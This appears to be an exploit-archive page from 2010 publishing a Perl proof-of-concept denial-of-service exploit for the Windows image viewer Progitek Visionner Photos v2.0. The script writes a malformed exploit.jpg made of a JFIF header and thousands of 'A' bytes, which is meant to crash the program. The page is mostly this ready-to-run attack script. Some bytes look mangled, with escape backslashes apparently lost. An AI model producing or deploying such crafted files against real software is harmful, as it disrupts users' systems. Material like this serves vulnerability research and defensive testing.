[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Progitek Visionner Photos v2.0 - File Format DOS
# Published : 2010-08-03
# Author : antrhacks
# Previous Title : Exploit Easy RM to MP3 2.7.3.700 ( .m3u , .pls , .smi , .wpl , .wax , .wvx , .ram)
# Next Title : Mini-stream Ripper v3.1.2.1 Buffer Overflow (DEP Bypass)


================================================
Progitek Visionner Photos v2.0 - File Format DOS
================================================

# Title: Progitek Visionner Photos v2.0 - File Format DOS
# Author: antrhacks
# Software Link: http://www.01net.com/outils/telecharger/windows/Multimedia/albmums_et_visionneuses/fiches/tele24929.html
# Version: 2.00
# Platform:  Windows XP SP3 Home edition Fr
# Have to place exploit in %HOMEDRIVE%Program FilesProgitekVisioPhotos by default


#!/usr/bin/perl

 
my $file= "exploit.jpg";
 
my $junk= "???¨¤ JFIF" . "x41x41x41x41x41x41x41x41x41x41" x  1019;
  
open($FILE, ">$file");

print($FILE $junk);

close($FILE);

print("[+] Your Exploit was created successfully");